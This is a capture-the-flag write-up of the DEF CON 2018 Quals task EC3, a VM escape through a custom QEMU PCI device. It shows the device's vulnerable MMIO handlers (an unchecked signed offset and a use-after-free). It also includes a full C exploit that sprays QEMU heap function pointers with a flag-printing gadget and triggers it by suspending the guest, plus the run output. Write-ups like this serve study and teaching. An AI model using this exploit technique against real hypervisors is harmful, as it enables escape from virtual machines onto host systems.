Elastic cloud compute (memory) corruption (or EC3 for short) was a binary pwn task in the recent DEF CON CTF 2018 Quals.

You’re dropped into a Linux virtual machine with root privileges, and your objective is to escape from the VM and read the flag on the host filesystem. The task description mentions a custom PCI device.

This virtual device’s implementation has a heap overflow vulnerability that allows out-of-bounds reads and writes, as well as a use-after-free (UAF) vulnerability. Although this is more than enough for well-known heap exploitation techniques, due to my inadequate pwn skills I resorted to heap spraying instead.

Reverse engineering

You’re given an archive containing a custom qemu-system-x86_64 binary along with some less interesting files such as the kernel, an initramfs image, bios-256k.bin and so on.

Nothing is known about this virtual PCI device at this point: no drivers, no documentation. The only option is to reverse-engineer its implementation. Although the binary is rather large (because it’s a patched QEMU), finding the device wasn’t too hard.

The device itself is really simple. It registers a so-called MMIO (memory-mapped I/O) region in the guest’s physical address space. Unlike ordinary RAM, memory accesses in the MMIO range are intercepted by the device and can cause side effects. For example, if the device in question were a serial port, a read from a certain location (a so-called register) could pop the next value from the input queue, and a write could push the given value into the output queue. Another register might contain a bitmask describing the current state of the device: output queue full, input queue non-empty, current speed, and so on. Both real hardware devices and devices emulated by hypervisors are usually driven this way.

In the case of a device emulated by a hypervisor, these registers are implemented by simple C functions. Here’s the source of our device (for clarity, it’s taken from the GitHub repository released after the end of the game):
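To make the serial port analogy concrete, here is a minimal sketch of how such registers could be modelled in C. Everything in it (the register offsets, the status bits, the names toy_serial, toy_mmio_read and toy_mmio_write, the queue capacity) is made up for illustration and does not correspond to any real device or to QEMU's API.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical register layout of a toy serial port (not a real device). */
enum {
    REG_DATA   = 0x0, /* read: pop from input queue; write: push to output queue */
    REG_STATUS = 0x4  /* read-only bitmask describing the device state */
};

enum {
    STATUS_RX_READY = 1u << 0, /* input queue is non-empty */
    STATUS_TX_FULL  = 1u << 1  /* output queue is full */
};

#define QUEUE_CAP 4

struct queue {
    uint8_t data[QUEUE_CAP];
    size_t head, len;
};

struct toy_serial {
    struct queue rx; /* bytes waiting to be read by the guest */
    struct queue tx; /* bytes written by the guest */
};

/* Append a byte to the ring buffer; returns -1 if it is full. */
static int queue_push(struct queue *q, uint8_t b) {
    if (q->len == QUEUE_CAP)
        return -1;
    q->data[(q->head + q->len) % QUEUE_CAP] = b;
    q->len++;
    return 0;
}

/* Remove the oldest byte from the ring buffer; returns -1 if it is empty. */
static int queue_pop(struct queue *q, uint8_t *out) {
    if (q->len == 0)
        return -1;
    *out = q->data[q->head];
    q->head = (q->head + 1) % QUEUE_CAP;
    q->len--;
    return 0;
}

/* Called by the emulator when the guest loads from the MMIO range. */
static uint32_t toy_mmio_read(struct toy_serial *s, uint32_t addr) {
    uint8_t b = 0;
    switch (addr) {
    case REG_DATA:
        queue_pop(&s->rx, &b); /* side effect: the byte is consumed */
        return b;
    case REG_STATUS:
        return (s->rx.len ? STATUS_RX_READY : 0) |
               (s->tx.len == QUEUE_CAP ? STATUS_TX_FULL : 0);
    default:
        return 0;
    }
}

/* Called by the emulator when the guest stores into the MMIO range. */
static void toy_mmio_write(struct toy_serial *s, uint32_t addr, uint32_t val) {
    if (addr == REG_DATA)
        queue_push(&s->tx, (uint8_t)val); /* silently dropped when full */
}
```

The point is that reading REG_DATA twice returns two different bytes, which ordinary RAM would never do. The device in this task follows the same pattern, except that its "registers" allocate, free and access heap buffers.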

#define NBUFS	0xF
uint8_t *my_bufs[NBUFS];

static uint64_t ooo_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    oooState *ooo = opaque;
	uint64_t val = 0x42069;

	int cmd = (0xF00000 & addr) >> 20;
	int bin = (0x0F0000 & addr) >> 16;
	switch (cmd) {
		case 0xF: // 42069 : just to check
			break;
		default: // read
			{
			int16_t offs = (0xFFFF & addr);
			if (my_bufs[bin]) {
				memcpy (&val, &my_bufs[bin][offs], size);
			}
			}
	}
	return val;
}

static void ooo_mmio_write(void *opaque, hwaddr addr, uint64_t val,
                unsigned size)
{
    oooState *ooo = opaque;

	int cmd = (0xF00000 & addr) >> 20;
	switch (cmd) {
		case 0: // alloc
			{
			int bin = (0x0F0000 & addr) >> 16;
			if (bin == 0xF) {
				for (int i = 0; i < NBUFS; ++i) {
					my_bufs[i] = malloc (val * sizeof (uint64_t));
				}
			} else {
				my_bufs[bin] = malloc (val * sizeof (uint64_t));
			}
			}
			break;
		case 1: // free
			{
			int bin = (0x0F0000 & addr) >> 16;
			free (my_bufs[bin]);
			}
			break;
		case 2: // write
			{
			int bin = (0x0F0000 & addr) >> 16;
			int16_t offs = (0xFFFF & addr);
			memcpy (&my_bufs[bin][offs], (void *)&val, size);
			}
			return;
		default:
			break;
	}
}

static const MemoryRegionOps ooo_mmio_ops = {
    .read = ooo_mmio_read,
    .write = ooo_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static void pci_ooo_realize(PCIDevice *pdev, Error **errp) {
    // ...
    memory_region_init_io(&ooo->mmio, OBJECT(ooo), &ooo_mmio_ops, ooo,
                    "ooo-mmio", 1 << 24);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &ooo->mmio);
}

There are several bugs here. First, offs is a signed 16-bit value that is never checked against the allocation size, so you can access (both read and write) offsets from -32768 to 32767 relative to the allocated buffer regardless of its actual size. Second, free does not clear the pointer stored in my_bufs, so you can keep using buffers after they are freed.

Additionally, the binary includes an unreferenced function that calls system("cat flag"). So if we take control of the program counter (RIP), we can just jump there.
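The signed offset is easy to miss, so here is a small sketch of the address decoding done by the handlers, together with a guest-side encoder. The struct ooo_addr and the function names ooo_decode and ooo_encode are my own and are not part of the device source. The narrowing conversion to int16_t is implementation-defined in C, but it wraps on GCC and Clang, which is the behaviour assumed here.

```c
#include <stdint.h>

/* Fields the device extracts from an MMIO offset (mirrors the handlers above). */
struct ooo_addr {
    int cmd;      /* bits 20..23 */
    int bin;      /* bits 16..19 */
    int16_t offs; /* bits 0..15, reinterpreted as a signed value */
};

/* Decode an MMIO offset the same way ooo_mmio_read/ooo_mmio_write do. */
static struct ooo_addr ooo_decode(uint64_t addr) {
    struct ooo_addr a;
    a.cmd = (int)((0xF00000 & addr) >> 20);
    a.bin = (int)((0x0F0000 & addr) >> 16);
    /* Values 0x8000..0xFFFF become -32768..-1 (wraps on GCC/Clang). */
    a.offs = (int16_t)(0xFFFF & addr);
    return a;
}

/* Hypothetical guest-side helper: build the MMIO offset for a request. */
static uint64_t ooo_encode(int cmd, int bin, int16_t offs) {
    return ((uint64_t)(cmd & 0xF) << 20) |
           ((uint64_t)(bin & 0xF) << 16) |
           (uint16_t)offs;
}
```

For example, ooo_decode(0x208000) yields cmd 2 (write), bin 0 and offs -32768, so a write at that MMIO offset lands 32 KiB before the start of buffer 0.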

Exploitation

Although PCI devices are usually driven by kernel modules, Linux also provides a way to access them from userspace (provided you have root). The interface is described in Documentation/filesystems/sysfs-pci.txt.

In short, you need to open the file /sys/devices/pci0000:00/0000:00:04.0/resource0 (the numbers may vary), mmap it into memory and access the required offsets.

Since the initramfs contains very few binaries (basically, only busybox), the exploit has to be written in C, compiled on another machine into a statically linked binary, and then transferred to the VM (uuencode/uudecode is my tool of choice for this kind of task).

Although the vulnerabilities present were enough to gain RCE using well-known heap exploitation techniques, I wasn’t feeling confident enough to do so properly. I decided to play dirty.

The heap where the overflow occurs is actually the heap of QEMU itself. It has to contain some useful structures that can be overwritten, right?

Hoping that it would contain some function pointers, I scanned the heap for all values that looked like pointers into the .text section of the QEMU binary, and replaced all of them with the address of the aforementioned system("cat flag") gadget.
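The scan itself is simple enough to try offline on an ordinary buffer. The sketch below is not the exploit (that one goes through the MMIO window); it only illustrates the "anything that looks like a code pointer gets replaced" heuristic. The function name patch_code_pointers is made up for this example, and the range check only makes sense when the .text addresses are known in advance, as with the fixed 0x400000-based addresses of this binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Replace every 8-byte word of buf (at 8-byte steps from its start) whose
 * value lies within [lo, hi] with target. Returns the number of patched words. */
static size_t patch_code_pointers(uint8_t *buf, size_t len,
                                  uint64_t lo, uint64_t hi, uint64_t target) {
    size_t patched = 0;
    for (size_t off = 0; off + sizeof(uint64_t) <= len; off += sizeof(uint64_t)) {
        uint64_t val;
        memcpy(&val, buf + off, sizeof val); /* avoids alignment and aliasing issues */
        if (val >= lo && val <= hi) {
            memcpy(buf + off, &target, sizeof target);
            patched++;
        }
    }
    return patched;
}
```

Calling it on a buffer that contains 0x47cc25 and 0x86b5ef with the range 0x400000..0xA34DC0 and the target 0x6E65F9 patches exactly those two words and leaves stack or libc-looking values alone. The obvious downside is that it also clobbers any plain integer that happens to fall in that range.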

Unfortunately, these pointers were never called, and I got stuck for several hours.

My thought process was as follows. Assuming there are actually live pointers (as opposed to remnants of already freed memory), in order to increase the chances that they will be called, the guest operating system has to ask the hypervisor or its virtual devices to do something. The more intricate, the better. There were very few devices available, and poking them would require writing some “drivers” for them, which would be rather troublesome.

Suddenly, an idea popped into my mind. ACPI is a known clusterfuck of weird shit. Attempting to suspend the machine will surely do something interesting. Suspend has to put all the devices to some sleep state, maybe even reset some of them, and so on.

And it actually did the trick. Attempting to suspend the guest operating system after running the heap spraying exploit gives the flag (and then crashes the hypervisor :)).

Exploit code

To summarize, the exploit works as follows:

  1. Opens the PCI device MMIO region.
  2. Uses out-of-bounds memory access to spray the heap, replacing function pointers with the address of the system("cat flag") gadget.
  3. Suspends the guest: echo mem > /sys/power/state

#include <stdio.h>
#include <inttypes.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#include <unistd.h>
#include <time.h>

#include <sys/mman.h>

static const char *path = "/sys/devices/pci0000:00/0000:00:04.0/resource0";

#define TEXT_START   0x400000 
#define TEXT_END     0xA34DC0

#define CATFLAG_FUNCTION 0x6E65F9

static void do_malloc(void *ptr, int index, int n) {
    uintptr_t addr = 0;
    addr |= 0 << 20;
    addr |= index << 16;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = n;
}

static void do_free(void *ptr, int index) {
    uintptr_t addr = 0;
    addr |= 1 << 20;
    addr |= index << 16;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = 0;
}

static void do_write(void *ptr, int index, int16_t offset, uint32_t value) {
    uintptr_t addr = 0;
    addr |= 2 << 20;
    addr |= index << 16;
    addr |= offset & 0xFFFF;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = value;
}

static void do_write64(void *ptr, int index, int16_t offset, uint64_t value) {
    do_write(ptr, index, offset, value);
    do_write(ptr, index, offset+4, value>>32);
}

static uint32_t do_read(void *ptr, int index, int16_t offset) {
    uintptr_t addr = 0;
    addr |= index << 16;
    addr |= offset & 0xFFFF;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    return *a;
}

static uint64_t do_read64(void *ptr, int index, int16_t offset) {
    return do_read(ptr, index, offset) | ((uint64_t)do_read(ptr, index, offset+4) << 32);
}

int main(int argc, char **argv) {
    int fd = open(path, O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    void *ptr = mmap((void*)0x700000000000ULL, 0x1000000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (ptr == MAP_FAILED) { /* mmap reports failure with MAP_FAILED, not NULL */
        perror("mmap");
        return 1;
    }
    printf("mmaped at %p\n", ptr);

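    /* Try allocation sizes of 1, 2, 4, ... 0x8000 units (the device multiplies by 8). */
    for (int n = 1; n < 0x10000; n *= 2) {
        do_malloc(ptr, 0, n);
        /* Scan the whole signed 16-bit offset range around the buffer, 8 bytes at a time. */
        for (int i = -32768; i < 32768; i += 8) {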
            uint64_t val = do_read64(ptr, 0, i);
            if (val >= TEXT_START && val <= TEXT_END) {
                do_write64(ptr, 0, i, CATFLAG_FUNCTION);
                printf("%d (%x): %"PRIx64" -> %"PRIx64"\n", i, (unsigned) i, val, do_read64(ptr, 0, i));
            }
        }
        do_free(ptr, 0);
    }

    system("echo mem > /sys/power/state");
}

Running it in the guest prints:

30376 (76a8): 47cc25 -> 6e65f9
30568 (7768): 86b5ef -> 6e65f9
[   14.960242] PM: Syncing filesystems ... done.
[   15.036161] Freezing user space processes ... (elapsed 0.011 seconds) done.
[   15.051247] Freezing remaining freezable tasks ... (elapsed 0.006 seconds) done.
[   15.061707] Suspending console(s) (use no_console_suspend to debug)
ooo{testflag_bushwhackers}
0
qemu: qemu_mutex_lock_impl: Invalid argument
Aborted (core dumped)

See also

  • http://uaf.io/exploitation/2018/05/13/DefconQuals-2018-EC3.html - writeup by uafio. Unlike me, he actually obtained an arbitrary write and overwrote a GOT entry.